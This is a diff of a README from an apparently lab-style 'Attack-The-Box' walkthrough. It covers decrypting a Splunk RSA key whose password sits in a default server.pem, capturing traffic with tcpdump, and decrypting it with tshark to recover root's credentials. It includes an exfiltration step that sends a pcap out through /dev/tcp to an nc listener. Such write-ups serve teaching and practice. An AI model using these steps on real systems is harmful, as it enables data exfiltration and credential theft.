MaxJackson13/Attack-The-Box/README.md

 <img src="images/sslpass.png">

 The password used to encrypt the above RSA key is static across splunk instances however and is in cleartext in `/opt/splunk/etc/system/default/server.pem`.
-I'll copy the key over to my box in a file `enc.pem` and run `openssl rsa -in enc.pem -out dec.pem` which will prompt me for the `sslPassword` and write the decrypted key to `dec.pem`

 <img src="images/traffic.png">

-Back on the box I let `tcpdump` run for a short while and sent the output to `output.pcap`.
-I can copy this file to the host by running `nc -nvlp 7777 > output.pcap` on my box and `cat output.pcap > /dev/tcp/172.18.0.1/7777` on the victim.
+With my other `sudo` privilege, I'll run `tcpdump` for a short while and send the output to `output.pcap`.
+I can exfil this file by running `nc -nvlp 7777 > output.pcap` on my box and `cat output.pcap > /dev/tcp/172.18.0.1/7777` on the victim.

 <img src="images/rootcreds.png">

+I'll copy the key over to my box in a file `enc.pem` and run `openssl rsa -in enc.pem -out dec.pem` which will prompt me for the `sslPassword` and write the decrypted key to `dec.pem`.
 Now I'll use `tshark` to try and decrypt the traffic using the plaintext RSA private key.
 'Grepping' for known headers, we can spot the basic authorization header which reveals root's credentials.
 Run `su -` and its job done.

 Finally run `sudo iptables -D OUTPUT -s 172.18.0.1 -d 172.18.0.3 -j DROP` to delete the iptables rule set in `start.sh`.